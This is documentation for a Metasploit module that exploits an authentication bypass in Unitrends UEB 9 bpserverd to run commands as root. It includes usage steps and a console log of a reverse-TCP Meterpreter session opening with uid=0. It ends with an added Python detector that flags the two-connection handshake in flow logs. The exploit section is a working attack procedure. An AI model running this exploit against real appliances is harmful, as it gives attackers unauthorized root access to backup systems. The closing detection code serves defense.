## Vulnerable Application

Unitrends UEB 9 bpserverd authentication bypass RCE

This exploit uses roughly the same process to gain root execution as does the apache user on the Unitrends appliance. The process is something like this:

1. Connect to xinetd process (it's usually running on port 1743)
2. This process will send something like: `?A,Connect36092`
3. Initiate a second connection to the port specified in the packet from xinetd (36092 in this example)
4. Send a specially crafted packet to xinetd, containing the command to be executed as root
5. Receive command output from the connection to port 36092
6. Close both connections

## Verification Steps

1. `use exploit/linux/misc/ueb9_bpserverd`
2. `set lhost [IP]`
3. `set rhost [IP]`
4. `exploit`
5. A meterpreter session should have been opened successfully

## Scenarios

### UEB 9.1 on CentOS 6.5

```
msf > use exploit/linux/misc/ueb9_bpserverd
msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_bpserverd) > exploit

[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 45425
[*] 10.0.0.230:1743 - Connecting to 45425
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 40889
[*] 10.0.0.230:1743 - Connecting to 40889
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 40016
[*] 10.0.0.230:1743 - Connecting to 40016
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port received: 53649
[*] 10.0.0.230:1743 - Connecting to 53649
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```
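
On the defensive side, the two-connection sequence listed under Vulnerable Application (a connection to port 1743 followed by one to the port it announces) leaves a recognisable pattern in flow logs. The following is an added example, not part of the module or of the original page, that pairs those connections and reports sources outside an allowlist. The flow-record layout, the 5-second pairing window and the trusted-client list are assumptions, and the sample records are constructed (hosts 10.0.0.50 and 10.0.0.77 are invented for the example).

```python
import ipaddress
from collections import defaultdict

XINETD_PORT = 1743       # bpserverd control port named on this page
WINDOW_SECONDS = 5.0     # assumption: max gap between control and data connections
# Assumption: hosts expected to speak to bpserverd (constructed allowlist).
TRUSTED_CLIENTS = {ipaddress.ip_address("127.0.0.1"), ipaddress.ip_address("10.0.0.50")}

# Constructed flow records: (epoch seconds, source IP, destination IP, destination port)
SAMPLE_FLOWS = [
    (100.0, "10.0.0.141", "10.0.0.230", 1743),
    (100.4, "10.0.0.141", "10.0.0.230", 45425),
    (101.9, "10.0.0.141", "10.0.0.230", 1743),
    (102.2, "10.0.0.141", "10.0.0.230", 40889),
    (110.0, "10.0.0.50", "10.0.0.230", 1743),
    (110.3, "10.0.0.50", "10.0.0.230", 51000),
    (200.0, "10.0.0.77", "10.0.0.230", 1743),   # control connection only
    (300.0, "10.0.0.77", "10.0.0.230", 443),    # unrelated, outside the window
]

def find_handshakes(flows, window=WINDOW_SECONDS):
    """Return {(src, dst): [(control_time, data_port), ...]} for paired connections."""
    pending = {}                 # (src, dst) -> time of the unpaired control connection
    pairs = defaultdict(list)
    for ts, src, dst, dport in sorted(flows):
        key = (src, dst)
        if dport == XINETD_PORT:
            pending[key] = ts
        elif key in pending and ts - pending[key] <= window:
            pairs[key].append((pending.pop(key), dport))
    return dict(pairs)

def untrusted_handshakes(flows, trusted=TRUSTED_CLIENTS):
    """Keep only handshakes whose source is not an expected bpserverd client."""
    return {
        key: hits for key, hits in find_handshakes(flows).items()
        if ipaddress.ip_address(key[0]) not in trusted
    }

if __name__ == "__main__":
    for (src, dst), hits in untrusted_handshakes(SAMPLE_FLOWS).items():
        ports = ", ".join(str(port) for _, port in hits)
        print(f"ALERT {src} -> {dst}: {len(hits)} bpserverd handshake(s), data ports {ports}")
```

Several handshakes from one source in quick succession, as in the scenario output where each command stager chunk opens a new pair of connections, is a stronger signal than a single pair.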